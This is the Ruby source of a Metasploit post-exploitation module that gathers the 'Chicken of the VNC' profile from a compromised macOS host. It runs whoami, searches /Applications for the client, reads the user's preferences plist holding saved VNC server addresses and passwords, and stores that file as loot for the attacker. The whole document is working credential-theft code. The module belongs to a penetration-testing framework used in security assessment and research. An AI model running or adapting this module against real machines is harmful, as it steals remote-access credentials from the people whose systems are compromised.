Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'OS X Gather Chicken of the VNC Profile',
14
        'Description' => %q{
15
          This module will download the "Chicken of the VNC" client application's
16
          profile file,	which is used to store other VNC servers' information such
17
          as the IP and password.
18
        },
19
        'License' => MSF_LICENSE,
20
        'Author' => [ 'sinn3r'],
21
        'Platform' => [ 'osx' ],
22
        'SessionTypes' => [ 'meterpreter', 'shell' ]
23
      )
24
    )
25
  end
26

27
  def whoami
28
    exec('/usr/bin/whoami')
29
  end
30

31
  #
32
  # This is just a wrapper for cmd_exec(), except it chomp() the output,
33
  # and retry under certain conditions.
34
  #
35
  def exec(cmd)
36
    tries = 0
37
    begin
38
      out = cmd_exec(cmd).chomp
39
    rescue ::Timeout::Error => e
40
      tries += 1
41
      if tries < 3
42
        vprint_error("#{@peer} - #{e.message} - retrying...")
43
        retry
44
      end
45
    rescue EOFError => e
46
      tries += 1
47
      if tries < 3
48
        vprint_error("#{@peer} - #{e.message} - retrying...")
49
        retry
50
      end
51
    end
52
  end
53

54
  def dir(path)
55
    subdirs = exec("ls -l #{path}")
56
    return [] if subdirs =~ /No such file or directory/
57

58
    items = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d:]+\x20(.+)$/).flatten
59
    return items
60
  end
61

62
  def locate_chicken
63
    dir('/Applications/').each do |folder|
64
      m = folder.match(/Chicken of the VNC\.app/)
65
      return true
66
    end
67

68
    return false
69
  end
70

71
  def get_profile_plist(user)
72
    f = exec("cat /Users/#{user}/Library/Preferences/com.geekspiff.chickenofthevnc.plist")
73
    if f =~ /No such file or directory/
74
      return nil
75
    else
76
      return f
77
    end
78
  end
79

80
  def save(file)
81
    p = store_loot(
82
      'chickenvnc.profile',
83
      'bin',
84
      session,
85
      file,
86
      'com.geekspiff.chickenofthevnc.plist'
87
    )
88

89
    print_good("#{@peer} - plist saved in #{p}")
90
  end
91

92
  def run
93
    @peer = "#{session.session_host}:#{session.session_port}"
94
    user = whoami
95

96
    if !locate_chicken
97
      print_error("#{@peer} - Chicken of the VNC is not installed")
98
      return
99
    else
100
      print_status("#{@peer} - Chicken of the VNC found")
101
    end
102

103
    plist = get_profile_plist(user)
104
    if plist.nil?
105
      print_error('No profile plist found')
106
    elsif !plist.nil?
107
      save(plist)
108
    end
109
  end
110
end
111

112